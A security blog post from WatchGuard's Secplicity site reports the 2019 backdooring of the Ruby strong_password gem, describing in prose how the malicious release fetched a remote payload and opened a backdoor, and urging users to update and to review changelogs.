• Articles
    • Editorial Articles
    • Research Articles
    • WatchGuard Articles
  • The 443 Podcast
  • Threat Landscape
  • About
    • About Us
    • Contact Us
    • Contribute to Secplicity

Secplicity - Security Simplified

Powered by WatchGuard Technologies

Ruby’s strong_password Gem Backdoored

July 8, 2019 By Emil Hozan

Just recently I wrote about how a software developer, who is security-aware, was spear-phished and almost fell victim to a Firefox 0-day exploit. Fortunately for him, he was using Google Chrome and not Firefox. Follow that link for more details about that story, but what both that story and this story share in common is a security checklist that both parties upheld.

 

With new software releases and developments, often times you’ll also see a changelog of some sort. Changelogs describe alterations new releases contain compared to prior versions. Reviewing these changelogs is important for many reasons, one of which is being aware of what’s changed and if there is a possibility of these changes affecting you and your product or company. So far so good, it makes sense: documenting changes is good and allows for fair disclosure of changes.

Now, this simple task that many can do, despite not fully understanding said changes and verbiage, allows for context to further research and collaborate with others in assessing potential impacts. However, this feat can also lead to the focal point of this blog: following breadcrumbs led to the discovery of a hijacked Ruby gem component named strong_password. Ruby is a programming language and a gem is a module or library of Ruby. strong_password is a Ruby gem that checks password strengths.

 

In brief, this maliciously released Ruby gem “update” first tests if the strong_password gem is used in production. If so, and after a random amount of time, the code reaches out to a pastebin.com listing and retrieves a second payload. This second payload essentially silently opens a backdoor, allowing an attacker to remotely execute code. In addition, it also sends a list of infected URLs to a different domain.

 

This author’s due diligence led Ruby’s security team to further investigate, ending with the nefarious gem’s release being pulled. That said, if you use Ruby and are a user of the strong_password gem, update this right away. Consider internally investigating any possible infiltrations and intrusion detection logs. The gem was downloaded less than 600 times; I can only assume that those impacted are still conducting their investigations.

As for others not directly impacted by this, and to broaden this message to other readers, consider taking the same steps with future releases as well, for all software-based products. This includes Ruby and other programming languages, even the OS release note updates of varying hardware products.

Share This:

Related

Filed Under: Editorial Articles Tagged With: Ruby on Rails, software vulnerability

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

The 443 Podcast

A weekly podcast featuring the leading white-hat hackers and security researchers. Listen Now
the 443 podcast

Threat Landscape

Filter and view Firebox Feed data by type of attack, region, country, and date range. View Now
threat landscape

Top Posts

  • Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!
  • US National Cybersecurity Strategy
  • Here Come The Regulations
  • Cybersecurity’s Toll on Mental Health

Email Newsletter

Sign up to get the latest security news and threat analysis delivered straight to your inbox

By signing up you agree to our Privacy Policy.


The views and opinions expressed on this website are those of the authors and do not necessarily reflect the policy or position of WatchGuard Technologies.

Stay in Touch

Recent Posts

  • Cybersecurity News: LastPass Incident Revealed, White House Issues Cybersecurity Strategy, FBI Purchases Leaked USHOR PII Data, and a Slew of Other Breaches
  • An Update on Section 230
  • Here Come The Regulations
  • US National Cybersecurity Strategy
  • Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!
View All

Search

Archives

Copyright © 2023 WatchGuard Technologies · Cookie Policy · Privacy Policy · Terms of Use